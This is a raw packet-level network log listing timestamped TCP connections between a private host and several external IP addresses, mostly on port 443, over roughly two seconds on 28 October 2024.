                                                                                                                                                Oct 28, 2024 17:47:36.509346962 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.509799004 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.535473108 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.535511017 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.551486969 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.551501989 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.583502054 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.599479914 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.605806112 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.605873108 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.605926991 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.605961084 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.606115103 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.606180906 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.606199026 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.606522083 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.606551886 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.606606960 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.606617928 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.606772900 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.630837917 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631058931 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631092072 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631122112 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631151915 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631153107 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.631186962 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631202936 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.631226063 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631283045 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.631293058 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.631339073 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.631684065 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.632050991 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.632076979 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.632133961 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.632143974 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.632298946 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.646379948 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.646462917 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.646541119 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.646574974 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.693474054 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.724248886 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724421024 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724494934 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.724499941 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724529028 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724637985 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.724674940 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724736929 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724770069 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724812984 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.724828959 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.724886894 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.725357056 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.735301018 CET44349726188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.735563993 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.735589981 CET44349726188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.736707926 CET44349726188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.736785889 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737063885 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737075090 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737123966 CET44349726188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.737127066 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737205982 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737433910 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737493992 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.737576008 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737822056 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.737837076 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.752566099 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.752856970 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.752914906 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.752922058 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.752934933 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.752974987 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.752981901 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.753022909 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.753102064 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.753149986 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.753163099 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.753180981 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.753237009 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.765115023 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.765713930 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.765759945 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.765822887 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.766127110 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:36.766169071 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.766242027 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:36.766484976 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:36.766498089 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.868602991 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.868638039 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.868700027 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.868846893 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.868904114 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.868927956 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.868957043 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.869021893 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.869031906 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.869164944 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.870805025 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.871119022 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.871203899 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.872317076 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.872397900 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.872697115 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.872776985 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.872909069 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.872920036 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.872957945 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.873008013 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.884480000 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.884562016 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.915486097 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.961091042 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.961148024 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.961177111 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.961208105 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.961236954 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.961261988 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.961877108 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.961934090 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.001421928 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.001518011 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.011698961 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:37.020205975 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020261049 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020293951 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020313978 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.020353079 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020397902 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020436049 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020447969 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.020454884 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020479918 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.020761013 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.020807981 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.020814896 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.075500965 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.075566053 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.075613976 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:37.079245090 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.079333067 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.079586029 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.079698086 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.079751968 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.079809904 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.079822063 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.079838991 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.079890966 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.079952955 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.079967976 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.123465061 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.138021946 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.138138056 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.138204098 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.138262033 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.138281107 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.141441107 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.141472101 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.141671896 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.141871929 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.141882896 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.168783903 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:37.168821096 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.168958902 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:37.169174910 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:37.169203043 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.315501928 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:37.382893085 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.383133888 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.383152008 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.384205103 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.384303093 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.384881020 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.384938955 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.385051012 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.385060072 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.426146984 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:37.426209927 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.426297903 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:37.427401066 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:37.427423954 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.427494049 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.430958986 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.431277990 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.431307077 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.432409048 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.432490110 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.432804108 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.432873011 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.432950974 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.432960033 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.475507975 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.674376011 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674438000 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674463034 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674490929 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674506903 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.674525976 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674567938 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674590111 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.674597979 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674628973 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.674669027 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.674669027 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.674679995 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.679996967 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680030107 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680054903 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.680058956 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680069923 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680356026 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680394888 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680423021 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680447102 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.680447102 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.680468082 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.680530071 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.681272030 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.681299925 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.681324959 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.681340933 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.681459904 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.779341936 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.779649019 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.779684067 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.780026913 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.780395985 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.780472994 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.780550003 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.780661106 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.780760050 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.780848026 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.780865908 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781030893 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781075954 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.781099081 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781323910 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781485081 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.781497002 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781765938 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781795979 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781860113 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.781872988 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.781930923 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.782486916 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.826459885 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.827346087 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899755001 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899818897 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899847984 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899876118 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899909019 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899929047 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.899951935 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.899962902 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.899996042 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.900036097 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.900052071 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.900142908 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:37.900161028 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.922466040 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:37.926121950 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.926203012 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.926347017 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.926793098 CET49730443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.926810980 CET44349730188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.943996906 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944042921 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944076061 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944097996 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.944101095 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944116116 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944144964 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.944643974 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944670916 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944700956 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.944710016 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944751978 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.944758892 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944773912 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.944813967 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.946281910 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.946288109 CET44349728188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:37.946296930 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:37.946341038 CET49728443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:38.206060886 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.206150055 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.210004091 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.210024118 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.210352898 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.254527092 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.292854071 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.335335016 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548209906 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548232079 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548239946 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548253059 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548279047 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548343897 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.548377037 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.548398972 CET49732443192.168.2.16172.202.163.200
